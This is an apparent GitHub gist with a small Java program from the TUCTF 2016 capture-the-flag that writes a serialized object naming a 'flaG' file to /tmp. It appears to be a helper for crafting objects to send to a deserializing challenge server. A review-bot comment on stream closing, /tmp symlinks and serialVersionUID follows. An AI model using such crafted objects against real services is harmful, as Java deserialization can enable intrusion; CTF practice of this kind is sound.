0xBADCA7 created this gist
May 14, 2016
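--- /dev/null
+++ b/Main.java
@@ -0,0 +1,53 @@
+/*
+ *
+ *
+ *
+ * @0xBADCA7 and github/0xBADCA7
+ *
+ * How to serialize Java objects. This is from TUCTF 2016.
+ *
+ *
+ *
+ * Just compile on the command line (IDE will taint serialization and place package identifiers):
+ *
+ * javac Main.java && java Main && cat /tmp/serialized.bin
+ *
+ *
+ *
+ *
+ */
+import java.io.FileOutputStream;
+import java.io.ObjectOutputStream;
+import java.io.Serializable;
+public class Main {
+    static String SAVE_PATH = "/tmp/serialized.bin";
+    public static void main(String[] args) throws Exception {
+        System.out.print("This tool generates serialized Java objects\r\n\r\n");
+        // This is an example of a class
+        OSFile f = null;
+        f = new UnixFile();
+        f.file = "flaG";
+        //
+        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(SAVE_PATH));
+        oos.writeObject(f); // your object goes here instead of "f"
+        oos.flush();
+        System.out.print("Serialized to " + SAVE_PATH + "\r\n");
+    }
+}
+// This belongs to the example only
+class UnixFile extends OSFile {
+    public String getFileName() {
+        //Unix filenames are case-sensitive, don't change
+        return "flaG";
+    }
+}
+// This belongs to the example only
+abstract class OSFile implements Serializable {
+    String file = "";
+    abstract String getFileName();
+}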
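Review bot: The ObjectOutputStream that main opens over `new FileOutputStream(SAVE_PATH)` is flushed but never closed, so the descriptor stays open until the JVM exits and a write error after the flush is silently lost; wrap it in try-with-resources, `try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(SAVE_PATH))) {` / `    oos.writeObject(f); // your object goes here instead of "f"` / `}`, which flushes and closes on exit from the block. SAVE_PATH is a fixed name in the shared /tmp directory and FileOutputStream follows a pre-existing symlink at that path, so a file another local user placed there beforehand would redirect the write; writing via Files.createTempFile or into a directory only the running user owns avoids that, and the constant should be `private static final String SAVE_PATH`. OSFile declares no serialVersionUID, so the default UID is derived from the class shape and any recompilation that changes it (the IDE package issue the header comment warns about) makes previously written files fail with InvalidClassException on read; `private static final long serialVersionUID = 1L;` on OSFile pins it. The `OSFile f = null;` before `f = new UnixFile();` is a dead assignment that can be folded into `OSFile f = new UnixFile();`.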